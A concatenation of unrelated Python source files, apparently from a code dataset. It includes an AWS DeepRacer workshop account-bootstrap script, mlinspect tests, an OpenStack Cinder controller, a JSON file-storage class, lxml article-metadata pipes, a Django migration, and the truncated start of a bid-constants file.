while True:
try:
result = client.assume_role(
RoleArn=role_arn,
RoleSessionName=sesion_name,
DurationSeconds=3600
)
if result is None:
raise botocore.exceptions.ClientError
except botocore.exceptions.ClientError as err:
time.sleep(5)
response = err.response
if (response and response.get("Error", {}).get("Code") == "AccessDenied"):
print("Failed to assume role. Error:{}.It will try to assume role again!".format(err.response['Error']['Code']))
continue
break
return result['Credentials']
def exists_iam_user(iam_client,account_name):
paginator = iam_client.get_paginator(
'list_users').paginate().build_full_result()
users = paginator['Users']
iam_user_found = False;
for user in users:
if str(account_name) == str(user['UserName']):
iam_user_found= True
break
return iam_user_found
def exists_attendee_policy(iam_client,policy_name):
paginator = iam_client.get_paginator(
'list_policies').paginate().build_full_result()
policies = paginator['Policies']
iam_policy_found = False;
for policy in policies:
if str(policy_name) == str(policy['Name']):
iam_policy_found= True
break
return iam_policy_found
def create_custom_iam_userpolicy(iam_client):
policy_name = "DeepRacerWorkshopAttendeePolicy"
policy_document = json.dumps({
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"iam:ChangePassword"
],
"Resource": "*"
}
]
})
create_policy_response=iam_client.create_policy(
PolicyName=policy_name,
PolicyDocument=policy_document
)
return create_policy_response['Policy']['Arn']
def attach_iam_user_policies(iam_client,account_name,custom_policy_arn):
iam_client.attach_user_policy(UserName=account_name,PolicyArn=custom_policy_arn)
iam_client.attach_user_policy(UserName=account_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerFullAccess")
iam_client.attach_user_policy(UserName=account_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerRoboMakerAccessPolicy")
iam_client.attach_user_policy(UserName=account_name,PolicyArn="arn:aws:iam::aws:policy/service-role/AWSDeepRacerServiceRolePolicy")
if os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') == 'TRUE':
iam_client.attach_user_policy(UserName=account_name,PolicyArn="arn:aws:iam::aws:policy/AWSBillingReadOnlyAccess")
def update_policies(account_id,iam_user_name,iam_client):
try:
iam_client.detach_user_policy(UserName=iam_user_name,
PolicyArn="arn:aws:iam::{}:policy/DeepRacerWorkshopAttendeePolicy".format(account_id)
)
print("Detached DeepRacerWorkshopAttendeePolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
except iam_client.exceptions.NoSuchEntityException as error:
print("Policy already detached --> Message: {}".format(error))
try:
iam_client.delete_policy(PolicyArn="arn:aws:iam::{}:policy/DeepRacerWorkshopAttendeePolicy".format(account_id))
print("Deleted DeepRacerWorkshopAttendeePolicy in account id:{}".format(account_id))
except iam_client.exceptions.NoSuchEntityException as error:
print("Policy already deleted --> Message: {}".format(error))
custom_policy_arn=create_custom_iam_userpolicy(iam_client)
print("Created DeepRacerWorkshopAttendeePolicy in account id:{}".format(account_id))
attach_iam_user_policies(iam_client,iam_user_name,custom_policy_arn)
print("Attached DeepRacerWorkshopAttendeePolicy, Billing Access to IAM User:{} in account id:{}".format(iam_user_name, account_id))
def set_permissions(sts_client,account_name,account_id,default_password,type=None):
assume_creds = assume_child_credentials(sts_client,account_id)
iam_client = boto3.client('iam', region_name=os.environ['AWS_DEFAULT_REGION'] ,
aws_access_key_id=assume_creds['AccessKeyId'],
aws_secret_access_key=assume_creds['SecretAccessKey'],
aws_session_token = assume_creds['SessionToken'])
iam_user_name="{}-deepracer-{}".format(account_name,account_id)
# iam_user_name="deepraceruser-{}".format(account_id)
if type == "update" and not exists_iam_user(iam_client,iam_user_name):
print("IAM user:{} not found, NO need to update. You should first bootstrap it. Exit!".format(iam_user_name))
return
if type == "update" and exists_iam_user(iam_client,iam_user_name):
print("IAM user:{} found, It will update the policies!".format(iam_user_name))
update_policies(account_id,iam_user_name,iam_client)
return
if type == "attach" and not exists_iam_user(iam_client,iam_user_name):
print("IAM user:{} not found, NO need to attach. You should first bootstrap it. Exit!".format(iam_user_name))
return
if type == "attach" and exists_iam_user(iam_client,iam_user_name):
print("IAM user:{} found, It will attach the policies!".format(iam_user_name))
iam_client.attach_user_policy(UserName=iam_user_name,
PolicyArn="arn:aws:iam::{}:policy/DeepRacerWorkshopAttendeePolicy".format(account_id)
)
print("Attached DeepRacerWorkshopAttendeePolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.attach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerFullAccess")
print("Attached AWSDeepRacerFullAccess from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.attach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerRoboMakerAccessPolicy")
print("Attached AWSDeepRacerRoboMakerAccessPolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.attach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/service-role/AWSDeepRacerServiceRolePolicy")
print("Attached AWSDeepRacerServiceRolePolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
if os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') == 'TRUE':
iam_client.attach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSBillingReadOnlyAccess")
print("Attached AWSBillingReadOnlyAccess from IAM User: {} in account id:{}".format(iam_user_name,account_id))
return
if type == "detach" and not exists_iam_user(iam_client,iam_user_name):
print("IAM user:{} not found, NO need to detach. You should first bootstrap it. Exit!".format(iam_user_name))
return
if type == "detach" and exists_iam_user(iam_client,iam_user_name):
try:
print("IAM user:{} found, It will detach the policies!".format(iam_user_name))
iam_client.detach_user_policy(UserName=iam_user_name,
PolicyArn="arn:aws:iam::{}:policy/DeepRacerWorkshopAttendeePolicy".format(account_id)
)
print("Detached DeepRacerWorkshopAttendeePolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.detach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerFullAccess")
print("Detached AWSDeepRacerFullAccess from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.detach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerRoboMakerAccessPolicy")
print("Detached AWSDeepRacerRoboMakerAccessPolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.detach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/service-role/AWSDeepRacerServiceRolePolicy")
print("Detached AWSDeepRacerServiceRolePolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
if os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') == 'TRUE':
iam_client.detach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSBillingReadOnlyAccess")
print("Detached AWSBillingReadOnlyAccess from IAM User: {} in account id:{}".format(iam_user_name,account_id))
except iam_client.exceptions.NoSuchEntityException as error:
print("Policy already detached --> Message: {}".format(error))
return
if not exists_iam_user(iam_client,iam_user_name):
iam_client.create_user(UserName=iam_user_name)
print("Created IAM User:{} in account id:{}".format(iam_user_name,account_id))
custom_policy_arn=create_custom_iam_userpolicy(iam_client)
print("Created DeepRacerWorkshopAttendeePolicy in account id:{}".format(account_id))
attach_iam_user_policies(iam_client,iam_user_name,custom_policy_arn)
print("Attached DeepRacerWorkshopAttendeePolicy to IAM User:{} in account id:{}".format(iam_user_name, account_id))
iam_client.create_login_profile(UserName=iam_user_name,Password=default_password,
PasswordResetRequired=True
)
print("Created Login Profile for IAM user: {} in account id:{}".format(iam_user_name,account_id))
else:
update_policies(account_id,iam_user_name,iam_client)
credentialsOperations(account_id,iam_user_name,account_name,default_password)
def credentialsOperations(account_id,iam_user_name,account_name,default_password):
existsCred = False
with open('credentials.csv') as read_file:
datafile = read_file.readlines()
for line in datafile:
if account_id in line:
existsCred = True
break
write_file = open("credentials.csv", "a")
if not existsCred:
write_file.write("{account_name};https://{account_id}.signin.aws.amazon.com/console;{iam_user_name};{default_password}\n".format(iam_user_name=iam_user_name,account_name=account_name,account_id=account_id,default_password=default_password))
print("Account id: {} credential written to credentials.csv".format(account_id))
else:
print("Account id: {} credential already exists in credentials.csv".format(account_id))
def create_org_unit(organization_client,source_root_id,ou_name):
paginator = organization_client.get_paginator(
'list_organizational_units_for_parent').paginate(ParentId=source_root_id).build_full_result()
ous = paginator['OrganizationalUnits']
ou_found = False;
org_unit = None
for ou in ous:
if str(ou_name) == str(ou['Name']):
ou_found= True
org_unit = ou
break
if not ou_found:
response = organization_client.create_organizational_unit(
ParentId=source_root_id,
Name=ou_name,
)
print("Organization Unit:{} is created under Root id:{}".format(ou_name,source_root_id))
return response['OrganizationalUnit']
else:
print("Organization Unit:{} is Already exists under Root id:{}".format(ou_name,source_root_id))
return org_unit
def move_child_accounts_to_org_unit(organization_client,account_id,source_root_id,dest_ou_id,account_name):
paginator = organization_client.get_paginator(
'list_accounts_for_parent').paginate(ParentId=dest_ou_id).build_full_result()
child_accounts = paginator['Accounts']
is_moved = False;
for child_account in child_accounts:
if str(account_name) == str(child_account['Name']):
is_moved= True
break
if not is_moved:
organization_client.move_account(
AccountId=account_id,
SourceParentId=source_root_id,
DestinationParentId=dest_ou_id
)
print("Child Account:{} is moved to organization unit:{}".format(account_id,dest_ou_id))
else:
print("Child Account:{} is Already in organization unit:{}".format(account_id,dest_ou_id))
def set_budget_alert_for_child(sts_client,account_id,amount,budget_name,budget_notifier_list, type=None ):
print("Setting Budget Alert for child account:{}".format(budget_name))
assume_creds = assume_child_credentials(sts_client,account_id)
budgets_client = boto3.client('budgets', region_name=os.environ['AWS_DEFAULT_REGION'] ,
aws_access_key_id=assume_creds['AccessKeyId'],
aws_secret_access_key=assume_creds['SecretAccessKey'],
aws_session_token = assume_creds['SessionToken'])
budget_found= False
count = 0
while True:
if count >= 30:
break
try:
budgets = budgets_client.describe_budgets(AccountId=account_id)['Budgets']
for budget in budgets:
if budget['BudgetName'] == budget_name:
print("Budget: {} is already exists.".format(budget_name))
budget_found = True
break
except KeyError:
budget_found = False
except ClientError as e:
time.sleep(5)
count = count+1
if e.response['Error']['Code'] == 'SubscriptionRequiredException':
print("Trial:{} Failed to call Budget API. It will try again!".format(count,e.response['Error']['Code']))
continue
break
if type == "delete" and budget_found:
print("Budget: {} is exists. It will delete the budget".format(budget_name))
budgets_client.delete_budget(AccountId=account_id,BudgetName=budget_name)
return
if type == "delete" and not budget_found:
print("Budget: {} is NOT exists. No need to delete".format(budget_name))
return
if type == "update" and not budget_found:
print("Budget: {} is NOT exists. No need to update".format(budget_name))
return
if type == "update" and budget_found:
print("Budget: {} is exists. It will be deleted, then re-created".format(budget_name))
budgets_client.delete_budget(AccountId=account_id,BudgetName=budget_name)
budget_found = False
if not budget_found:
print("Budget limit: ${} for budget name:{} will be created".format(amount,budget_name))
response = budgets_client.create_budget(
AccountId=account_id,
Budget={
'BudgetName': budget_name,
'BudgetLimit': {
'Amount': str(amount),
'Unit': 'USD'
},
'CostTypes': {
'IncludeTax': True,
'IncludeSubscription': True,
'UseBlended': False,
'IncludeRefund': True,
'IncludeCredit': True,
'IncludeUpfront': True,
'IncludeRecurring': True,
'IncludeOtherSubscription': True,
'IncludeSupport': True,
'IncludeDiscount': True,
'UseAmortized': True
},
'TimeUnit': 'MONTHLY',
'BudgetType': 'COST'
},
NotificationsWithSubscribers=[
{
'Notification': {
'NotificationType': 'ACTUAL',
'ComparisonOperator': 'GREATER_THAN',
'Threshold': 80,
'ThresholdType': 'PERCENTAGE'
},
'Subscribers': budget_notifier_list
},
]
)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
print("Budget:{} is created under account id: {}".format(budget_name,account_id))
def get_root_id(organization_client):
return organization_client.list_roots()['Roots'][0]['Id']
def parse_args():
parser = argparse.ArgumentParser(description='AWS DeepRacer Account Bootstrap Script', usage='deepracer.py [<args>]')
parser.add_argument(
'-i',
'--input',
metavar="<Input-File-Name>",
nargs=1,
help='Enter the input file name(i.e. emails.csv)',required=True)
parser.add_argument(
'-m',
'--mode',
nargs=1,
help='Type the action you want to run. Available modes: <bootstrap, update-policies, attach-policies, detach-policies, update-budgets, delete-budgets> ',required=True)
args = parser.parse_args(sys.argv[1:])
return vars(args)
def bootstrap(account_id,account_name,email,source_root_id,dest_ou_id,organization_client,sts_client,default_password,amount,budget_notifier_list):
if not account_id:
print("Creating child account: {} under root account".format(account_name))
create_account_response = organization_client.create_account(
Email=email,
AccountName=account_name,
RoleName="OrganizationAccountAccessRole",
IamUserAccessToBilling="DENY"
)
count =0
while True:
describe_account_response = organization_client.describe_create_account_status(
CreateAccountRequestId=create_account_response['CreateAccountStatus']['Id']
)
if describe_account_response['CreateAccountStatus']['State'] == "SUCCEEDED":
print("Child Account: {} is created under root account".format(account_name))
break
time.sleep(3)
count = count +1
if describe_account_response['CreateAccountStatus']['State'] == "FAILED" or count > 20: # 20x3= 60 sec timeout
raise Exception("Problem occurred while creating account id")
child_account_id = get_account_id(organization_client,email)
set_permissions(sts_client,account_name,child_account_id,default_password)
budget_name="Budget-Alert-for-{}-{}".format(account_name,child_account_id)
set_budget_alert_for_child(sts_client,child_account_id,amount,budget_name,budget_notifier_list)
move_child_accounts_to_org_unit(organization_client,child_account_id,source_root_id,dest_ou_id,account_name)
else:
print("Updating permissions for existing child account: {}".format(account_name))
set_permissions(sts_client,account_name,account_id,default_password)
budget_name="Budget-Alert-for-{}-{}".format(account_name,account_id)
set_budget_alert_for_child(sts_client,account_id,amount,budget_name,budget_notifier_list)
move_child_accounts_to_org_unit(organization_client,account_id,source_root_id,dest_ou_id,account_name)
def run_mode(mode,email,budget_notifier_list,source_root_id,dest_ou_id,organization_client,sts_client):
print("------")
account_name = email.split('@')[0]
account_id = get_account_id(organization_client, email)
default_password=os.environ.get('DEFAULT_CHILD_ACCOUNT_PASS')
amount = os.environ.get('BUDGET_LIMIT')
if mode == "bootstrap":
bootstrap(account_id,account_name,email,source_root_id,dest_ou_id,organization_client,sts_client,default_password,amount,budget_notifier_list)
elif mode == "update-policies":
set_permissions(sts_client,account_name,account_id,default_password,type="update")
elif mode == "detach-policies":
set_permissions(sts_client,account_name,account_id,default_password,type="detach")
elif mode == "attach-policies":
set_permissions(sts_client,account_name,account_id,default_password,type="attach")
elif mode == "update-budgets":
budget_name="Budget-Alert-for-{}-{}".format(account_name,account_id)
set_budget_alert_for_child(sts_client,account_id,amount,budget_name,budget_notifier_list,type="update")
elif mode == "delete-budgets":
budget_name="Budget-Alert-for-{}-{}".format(account_name,account_id)
set_budget_alert_for_child(sts_client,account_id,amount,budget_name,budget_notifier_list, type="delete")
else:
print("No available modes found. Please enter Available modes: <bootstrap, update-policies, attach-policies, detach-policies, update-budgets, delete-budgets>")
exit(1)
if __name__ == '__main__':
args = parse_args()
mode = args.get('mode')[0]
file_name = args.get('input')[0]
check_env_variables()
organization_client = boto3.client('organizations')
sts_client = boto3.client('sts')
budget_notifier_list = [notifier.replace(" ","") for notifier in os.environ.get("BUDGET_NOTIFIERS_LIST").split(',')]
budget_notifier_list = [{'SubscriptionType': 'EMAIL','Address': notifier } for notifier in budget_notifier_list]
if len(budget_notifier_list) > 10:
print("Maximum 10 emails are supported for budget notifier in 'BUDGET_NOTIFIERS_LIST' environment variable.")
exit(1)
ou_name = os.environ.get('OU_NAME')
source_root_id = get_root_id(organization_client)
dest_ou_id= create_org_unit(organization_client,source_root_id,ou_name)['Id']
print("Source root id:'{}', Dest OU ID: '{}' \n".format(source_root_id,dest_ou_id))
emailfile = open(file_name, 'r')
emaillist = [l for l in (line.strip() for line in emailfile) if l]
for email in emaillist:
run_mode(mode,email,budget_notifier_list,source_root_id,dest_ou_id,organization_client,sts_client)
| python |
"""
Tests whether the PipelineExecutor works
"""
import os
from inspect import cleandoc
import networkx
from testfixtures import compare
from mlinspect.instrumentation.dag_node import CodeReference
from mlinspect.utils import get_project_root
from mlinspect.instrumentation import pipeline_executor
from ..utils import get_expected_dag_adult_easy_py, get_expected_dag_adult_easy_ipynb, \
get_pandas_read_csv_and_dropna_code
FILE_PY = os.path.join(str(get_project_root()), "test", "pipelines", "adult_easy.py")
FILE_NB = os.path.join(str(get_project_root()), "test", "pipelines", "adult_easy.ipynb")
def test_pipeline_executor_py_file(mocker):
"""
Tests whether the PipelineExecutor works for .py files
"""
pipeline_executor.singleton = pipeline_executor.PipelineExecutor()
before_call_used_value_spy = mocker.spy(pipeline_executor, 'before_call_used_value')
before_call_used_args_spy = mocker.spy(pipeline_executor, 'before_call_used_args')
before_call_used_kwargs_spy = mocker.spy(pipeline_executor, 'before_call_used_kwargs')
after_call_used_spy = mocker.spy(pipeline_executor, 'after_call_used')
extracted_dag = pipeline_executor.singleton.run(None, FILE_PY, None, []).dag
expected_dag = get_expected_dag_adult_easy_py()
assert networkx.to_dict_of_dicts(extracted_dag) == networkx.to_dict_of_dicts(expected_dag)
assert before_call_used_value_spy.call_count == 11
assert before_call_used_args_spy.call_count == 15
assert before_call_used_kwargs_spy.call_count == 14
assert after_call_used_spy.call_count == 15
def test_pipeline_executor_nb_file(mocker):
"""
Tests whether the PipelineExecutor works for .ipynb files
"""
pipeline_executor.singleton = pipeline_executor.PipelineExecutor()
before_call_used_value_spy = mocker.spy(pipeline_executor, 'before_call_used_value')
before_call_used_args_spy = mocker.spy(pipeline_executor, 'before_call_used_args')
before_call_used_kwargs_spy = mocker.spy(pipeline_executor, 'before_call_used_kwargs')
after_call_used_spy = mocker.spy(pipeline_executor, 'after_call_used')
extracted_dag = pipeline_executor.singleton.run(FILE_NB, None, None, []).dag
expected_dag = get_expected_dag_adult_easy_ipynb()
assert networkx.to_dict_of_dicts(extracted_dag) == networkx.to_dict_of_dicts(expected_dag)
assert before_call_used_value_spy.call_count == 11
assert before_call_used_args_spy.call_count == 15
assert before_call_used_kwargs_spy.call_count == 14
assert after_call_used_spy.call_count == 15
def test_pipeline_executor_function_call_info_extraction():
"""
Tests whether the capturing of module information works
"""
test_code = get_pandas_read_csv_and_dropna_code()
pipeline_executor.singleton = pipeline_executor.PipelineExecutor()
pipeline_executor.singleton.run(None, None, test_code, [])
expected_module_info = {CodeReference(5, 13, 5, 85): ('posixpath', 'join'),
CodeReference(5, 26, 5, 49): ('builtins', 'str'),
CodeReference(5, 30, 5, 48): ('mlinspect.utils', 'get_project_root'),
CodeReference(6, 11, 6, 34): ('pandas.io.parsers', 'read_csv'),
CodeReference(7, 7, 7, 24): ('pandas.core.frame', 'dropna')}
compare(pipeline_executor.singleton.code_reference_to_module, expected_module_info)
def test_pipeline_executor_function_subscript_index_info_extraction():
"""
Tests whether the capturing of module information works
"""
test_code = cleandoc("""
import os
import pandas as pd
from mlinspect.utils import get_project_root
train_file = os.path.join(str(get_project_root()), "test", "data", "adult_train.csv")
raw_data = pd.read_csv(train_file, na_values='?', index_col=0)
data = raw_data.dropna()
data['income-per-year']
""")
pipeline_executor.singleton = pipeline_executor.PipelineExecutor()
pipeline_executor.singleton.run(None, None, test_code, [])
expected_module_info = {CodeReference(5, 13, 5, 85): ('posixpath', 'join'),
CodeReference(5, 26, 5, 49): ('builtins', 'str'),
CodeReference(5, 30, 5, 48): ('mlinspect.utils', 'get_project_root'),
CodeReference(6, 11, 6, 62): ('pandas.io.parsers', 'read_csv'),
CodeReference(7, 7, 7, 24): ('pandas.core.frame', 'dropna'),
CodeReference(8, 0, 8, 23): ('pandas.core.frame', '__getitem__')}
compare(pipeline_executor.singleton.code_reference_to_module, expected_module_info)
| python |
# Copyright (c) 2016 Stratoscale, Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from cinder.api.contrib import volume_manage as volume_manage_v2
from cinder.api.openstack import wsgi
from cinder import exception
class VolumeManageController(volume_manage_v2.VolumeManageController):
def _ensure_min_version(self, req, allowed_version):
version = req.api_version_request
if not version.matches(allowed_version, None):
raise exception.VersionNotFoundForAPIMethod(version=version)
@wsgi.response(202)
def create(self, req, body):
self._ensure_min_version(req, "3.8")
return super(VolumeManageController, self).create(req, body)
@wsgi.extends
def index(self, req):
"""Returns a summary list of volumes available to manage."""
self._ensure_min_version(req, "3.8")
return super(VolumeManageController, self).index(req)
@wsgi.extends
def detail(self, req):
"""Returns a detailed list of volumes available to manage."""
self._ensure_min_version(req, "3.8")
return super(VolumeManageController, self).detail(req)
def create_resource():
return wsgi.Resource(VolumeManageController())
| python |
#!/usr/bin/python3
"""
Importing models using the FileStorage class
"""
import json
import models
import os.path
class FileStorage:
"""
Class that serializes instances to a JSON
file and deserializes JSON file to instances
"""
__file_path = "file.json"
__objects = {}
def all(self):
"""
Returns the dictionary __objects
"""
return FileStorage.__objects
def new(self, obj):
"""
Sets in __objects the obj with key <obj class name>.id
"""
objkey = '{}.{}'.format(obj.__class__.__name__, obj.id)
self.__objects[objkey] = obj
def save(self):
"""
Serializes __objects to the JSON file (path: __file_path)
"""
new_dict = {}
save_file = self.__file_path
"""
k for key
"""
for k, item in self.__objects.items():
new_dict[k] = item.to_dict()
with open(save_file, "w", encoding='utf-8') as new_file:
json.dump(new_dict, new_file)
def classes(self):
"""
Returns a dictionary of valid classes and their references.
"""
from models.base_model import BaseModel
from models.user import User
from models.state import State
from models.city import City
from models.amenity import Amenity
from models.place import Place
from models.review import Review
classes = {"BaseModel": BaseModel,
"User": User,
"State": State,
"City": City,
"Amenity": Amenity,
"Place": Place,
"Review": Review}
return classes
def reload(self):
"""
Deserializes the JSON file to __objects only if the JSON file exists
"""
try:
with open(self.__file_path, encoding="utf-8") as f:
data = json.loads(f.read())
new_dict = dict()
for key, value in data.items():
classes = value['__class__']
self.__objects[key] = globals()[classes](**value)
except Exception:
pass | python |
#coding: utf-8
from lxml import etree as ET
import re
import plumber
SUPPLBEG_REGEX = re.compile(r'^0 ')
SUPPLEND_REGEX = re.compile(r' 0$')
ISO6392T_TO_ISO6392B = {
u'sqi': u'alb',
u'hye': u'arm',
u'eus': u'baq',
u'mya': u'bur',
u'zho': u'chi',
u'ces': u'cze',
u'nld': u'dut',
u'fra': u'fre',
u'kat': u'geo',
u'deu': u'ger',
u'ell': u'gre',
u'isl': u'ice',
u'mkd': u'mac',
u'msa': u'may',
u'mri': u'mao',
u'fas': u'per',
u'ron': u'rum',
u'slk': u'slo',
u'bod': u'tib',
u'cym': u'wel'
}
class SetupArticlePipe(plumber.Pipe):
def transform(self, data):
xml = ET.Element('records')
return data, xml
class XMLArticlePipe(plumber.Pipe):
def transform(self, data):
raw, xml = data
article = ET.Element('record')
xml.append(article)
return data
class XMLJournalMetaJournalTitlePipe(plumber.Pipe):
def transform(self, data):
raw, xml = data
journaltitle = ET.Element('journalTitle')
journaltitle.text = raw.journal.title
xml.find('./record').append(journaltitle)
return data
class XMLJournalMetaISSNPipe(plumber.Pipe):
def transform(self, data):
raw, xml = data
issn = ET.Element('issn')
issn.text = raw.any_issn()
xml.find('./record').append(issn)
return data
class XMLJournalMetaPublisherPipe(plumber.Pipe):
def transform(self, data):
raw, xml = data
for item in raw.journal.publisher_name or []:
publisher = ET.Element('publisher')
publisher.text = item
xml.find('./record').append(publisher)
return data
class XMLArticleMetaIdPipe(plumber.Pipe):
def transform(self, data):
raw, xml = data
uniquearticleid = ET.Element('publisherRecordId')
uniquearticleid.text = raw.publisher_id
xml.find('./record').append(uniquearticleid)
return data
class XMLArticleMetaArticleIdDOIPipe(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.doi:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
articleiddoi = ET.Element('doi')
articleiddoi.text = raw.doi
xml.find('./record').append(articleiddoi)
return data
class XMLArticleMetaTitlePipe(plumber.Pipe):
def transform(self, data):
raw, xml = data
if raw.original_title():
title = ET.Element('title')
title.text = raw.original_title()
title.set('language', ISO6392T_TO_ISO6392B.get(raw.original_language(), raw.original_language()))
xml.find('./record').append(title)
elif raw.translated_titles() and len(raw.translated_titles()) != 0:
item = [(k,v) for k, v in raw.translated_titles().items()][0]
title = ET.Element('title')
title.text = item[1]
title.set('language', ISO6392T_TO_ISO6392B.get(item[0], item[0]))
xml.find('./record').append(title)
return data
class XMLArticleMetaAuthorsPipe(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.authors:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
contribgroup = ET.Element('authors')
for author in raw.authors:
names = [author.get('given_names', ''), author.get('surname', '')]
contribname = ET.Element('name')
contribname.text = ' '.join(names)
contrib = ET.Element('author')
contrib.append(contribname)
for xr in author.get('xref', []):
xref = ET.Element('affiliationId')
xref.text = xr
contrib.append(xref)
contribgroup.append(contrib)
xml.find('./record').append(contribgroup)
return data
class XMLArticleMetaAffiliationPipe(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.mixed_affiliations:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
affs = ET.Element('affiliationsList')
for affiliation in raw.mixed_affiliations:
if 'institution' in affiliation:
aff = ET.Element('affiliationName')
aff.set('affiliationId', affiliation['index'])
aff.text = affiliation['institution']
affs.append(aff)
xml.find('./record').append(affs)
return data
class XMLArticleMetaPublicationDatePipe(plumber.Pipe):
def transform(self, data):
raw, xml = data
pubdate = ET.Element('publicationDate')
pubdate.text = raw.publication_date
xml.find('./record').append(pubdate)
return data
class XMLArticleMetaStartPagePipe(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.start_page:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
startpage = ET.Element('startPage')
startpage.text = raw.start_page
xml.find('./record').append(startpage)
return data
class XMLArticleMetaEndPagePipe(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.end_page:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
endpage = ET.Element('endPage')
endpage.text = raw.end_page
xml.find('./record').append(endpage)
return data
class XMLArticleMetaVolumePipe(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.issue.volume:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
volume = ET.Element('volume')
volume.text = raw.issue.volume
xml.find('./record').append(volume)
return data
class XMLArticleMetaIssuePipe(plumber.Pipe):
def transform(self, data):
raw, xml = data
label_volume = raw.issue.volume.replace('ahead', '0') if raw.issue.volume else '0'
label_issue = raw.issue.number.replace('ahead', '0') if raw.issue.number else '0'
vol = ET.Element('volume')
vol.text = label_volume.strip()
label_suppl_issue = ' suppl %s' % raw.issue.supplement_number if raw.issue.supplement_number else ''
if label_suppl_issue:
label_issue += label_suppl_issue
label_suppl_volume = ' suppl %s' % raw.issue.supplement_volume if raw.issue.supplement_volume else ''
if label_suppl_volume:
label_issue += label_suppl_volume
label_issue = SUPPLBEG_REGEX.sub('', label_issue)
label_issue = SUPPLEND_REGEX.sub('', label_issue)
if label_issue.strip():
issue = ET.Element('issue')
issue.text = label_issue.strip()
xml.find('./record').append(issue)
return data
class XMLArticleMetaDocumentTypePipe(plumber.Pipe):
def transform(self, data):
raw, xml = data
documenttype = ET.Element('documentType')
documenttype.text = raw.document_type
xml.find('./record').append(documenttype)
return data
class XMLArticleMetaFullTextUrlPipe(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.html_url:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
url = ET.Element('fullTextUrl')
url.set('format', 'html')
url.text = raw.html_url(language='en')
xml.find('./record').append(url)
return data
class XMLArticleMetaAbstractsPipe(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.original_abstract() and not raw.translated_abstracts():
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
articlemeta = xml.find('./record')
if raw.original_abstract():
abstract = ET.Element('abstract')
abstract.set('language', ISO6392T_TO_ISO6392B.get(raw.original_language(), raw.original_language()))
abstract.text = raw.original_abstract()
articlemeta.append(abstract)
if raw.translated_abstracts():
for lang, text in raw.translated_abstracts().items():
abstract = ET.Element('abstract')
abstract.set('language', ISO6392T_TO_ISO6392B.get(lang, lang))
abstract.text = text
articlemeta.append(abstract)
return data
class XMLArticleMetaKeywordsPipe(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.keywords():
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
articlemeta = xml.find('./record')
if raw.keywords():
for lang, keywords in raw.keywords().items():
kwdgroup = ET.Element('keywords')
kwdgroup.set('language', ISO6392T_TO_ISO6392B.get(lang, lang))
for keyword in keywords:
kwd = ET.Element('keyword')
kwd.text = keyword
kwdgroup.append(kwd)
articlemeta.append(kwdgroup)
return data
class XMLClosePipe(plumber.Pipe):
def transform(self, data):
raw, xml = data
data = ET.tostring(xml, encoding="utf-8", method="xml")
return data
| python |
# Generated by Django 3.1.2 on 2020-10-12 22:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dominios', '0002_dominio_data_updated'),
]
operations = [
migrations.AddField(
model_name='dominio',
name='uid_anterior',
field=models.IntegerField(default=0, help_text='to be deleted after migration'),
),
]
| python |
# -*- coding: utf-8 -*-
from datetime import datetime
DISCOUNT_RATE = 0.125
BASE_BID = {'NBUdiscountRate': DISCOUNT_RATE,
'annualCostsReduction': [92.47] + [250] * 20,
'yearlyPaymentsPercentage': 0.70,
'contractDuration': {'years': 2, 'days': 10},
